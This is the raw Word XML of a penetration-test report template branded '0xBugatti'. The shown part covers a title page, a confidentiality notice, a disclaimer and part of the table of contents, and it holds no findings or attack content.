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12D6E" w14:textId="22CFBE4B" w:rsidR="00475B86" w:rsidRDefault="0004373D" w:rsidP="0004373D">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="320" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Hlk178498296"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidRPr="55C61B31">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="55C61B31">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>xBugatti .</w:t>
      </w:r>
      <w:r w:rsidR="00C02FE0" w:rsidRPr="55C61B31">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ink</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="68EF1F70" w14:textId="3677F66D" w:rsidR="00475B86" w:rsidRDefault="00132732" w:rsidP="0006493F">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:spacing w:before="1440" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_8cu1o4xedxtb" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidRPr="008D468E">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="002060"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t>2024</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC" w:rsidRPr="008D468E">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:color w:val="002060"/>
          <w:sz w:val="72"/>
          <w:szCs w:val="72"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Assessment Report Prepared For</w:t>
      </w:r>
      <w:r w:rsidR="00922DBC">
        <w:rPr>
          <w:rFonts w:ascii="Proxima Nova" w:eastAsia="Proxima Nova" w:hAnsi="Proxima Nova" w:cs="Proxima Nova"/>
          <w:b/>
          <w:color w:val="404040"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="008D468E" w:rsidRPr="008D468E">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="33357EAD" wp14:editId="4E8E467B">
            <wp:extent cx="3295650" cy="3295650"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="162965181" name="Picture 1" descr="A logo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5181" name="Picture 1" descr="A logo with dots and lines&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3296108" cy="3296108"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38960B4B" w14:textId="7E01D7E1" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F3BFC88" w14:textId="1E3F134B" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B53E7C3" w14:textId="33131575" w:rsidR="00475B86" w:rsidRDefault="005B0E22" w:rsidP="005B0E22">
      <w:pPr>
        <w:bidi/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Client Name Here         </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEF1582" w14:textId="62CCF23B" w:rsidR="00475B86" w:rsidRDefault="005B0E22">
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00922DBC">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Report Issued: </w:t>
      </w:r>
      <w:r w:rsidR="0006493F">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>11/11/2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B18E4D5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="150F9998" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_6xjv2myrl730" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="3" w:name="_Toc178498945"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Confidentiality Notice</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="12842A5F" w14:textId="6CD8E9AD" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="1F04327A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>This report contains sensitive, privileged, and confidential information. Precautions should be taken to protect the confidentiality of the information in this document. Publication of this report may cause reputational damage to &lt;CLIENT NAME&gt; or facilitate attacks against &lt;CLIENT NAME&gt;. &lt;TEAM NAME&gt; shall not be held liable for special, incidental, collateral or consequential damages arising out of the use of this information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735A434B" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_3aofwon93h1i" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="5" w:name="_Toc178498946"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r>
        <w:t>Disclaimer</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="68D48AB5" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC" w:rsidP="1F04327A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="1F04327A">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that this assessment may not disclose all vulnerabilities that are present on the systems within the scope of the engagement. This report is a summary of the findings from a “point-in-time” assessment made on &lt;CLIENT NAME&gt;’s environment. Any changes made to the environment during the period of testing may affect the results of the assessment. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B53B305" w14:textId="77777777" w:rsidR="00CB3668" w:rsidRDefault="00CB3668" w:rsidP="1F04327A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E55399A" w14:textId="77777777" w:rsidR="00CB3668" w:rsidRDefault="00CB3668" w:rsidP="1F04327A">
      <w:pPr>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="414D74B5" w14:textId="77777777" w:rsidR="00CB3668" w:rsidRPr="00CB3668" w:rsidRDefault="00CB3668" w:rsidP="1F04327A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56DB0D5D" w14:textId="77777777" w:rsidR="00CB3668" w:rsidRPr="00CB3668" w:rsidRDefault="00CB3668" w:rsidP="1F04327A">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3CDA2256" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="17641C41" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00475B86"/>
    <w:p w14:paraId="769CA960" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="731AB7D1" w14:textId="77777777" w:rsidR="00475B86" w:rsidRDefault="00922DBC">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>TABLE OF CONTENTS</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en"/>
        </w:rPr>
        <w:id w:val="174384430"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="383870FA" w14:textId="355E7EC6" w:rsidR="006833CF" w:rsidRDefault="006833CF">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
          </w:pPr>
          <w:r>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="1AE1C928" w14:textId="53B1B958" w:rsidR="008D468E" w:rsidRDefault="006833CF">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78498945" w:history="1">
            <w:r w:rsidR="008D468E" w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Confidentiality Notice</w:t>
            </w:r>
            <w:r w:rsidR="008D468E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008D468E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008D468E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498945 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008D468E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008D468E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r w:rsidR="008D468E">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62EED4D4" w14:textId="6E98C5C5" w:rsidR="008D468E" w:rsidRDefault="008D468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46" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Disclaimer</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498946 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7F67A5EC" w14:textId="625CC525" w:rsidR="008D468E" w:rsidRDefault="008D468E">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47" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Assessment Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498947 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="465557EE" w14:textId="6036EC60" w:rsidR="008D468E" w:rsidRDefault="008D468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48" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>1. About Our Company</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498948 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="531B0F6A" w14:textId="2F01E018" w:rsidR="008D468E" w:rsidRDefault="008D468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49" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Phases of penetration testing</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498949 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="502B3A10" w14:textId="4C5F03EE" w:rsidR="008D468E" w:rsidRDefault="008D468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50" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>3. Engagement Team</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498950 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="255F4883" w14:textId="09A7990F" w:rsidR="008D468E" w:rsidRDefault="008D468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51" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>4. Engagement Contacts</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498951 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="536D951E" w14:textId="2149C76D" w:rsidR="008D468E" w:rsidRDefault="008D468E">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52" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>EXECUTIVE SUMMARY</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498952 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2DFE7D56" w14:textId="576E32B6" w:rsidR="008D468E" w:rsidRDefault="008D468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53" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498953 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>8</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="171B1321" w14:textId="3E40B17C" w:rsidR="008D468E" w:rsidRDefault="008D468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54" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:b/>
                <w:bCs/>
                <w:noProof/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>2. Summary of Findings:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498954 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="04B98606" w14:textId="4FED6196"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55" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>1. Vulnerabilities and Risk Overview:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc178498955 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00C94D54">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>9</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5C574E06" w14:textId="19F7526E"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56" w:history="1">
            <w:r w:rsidRPr="00C45EB9">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
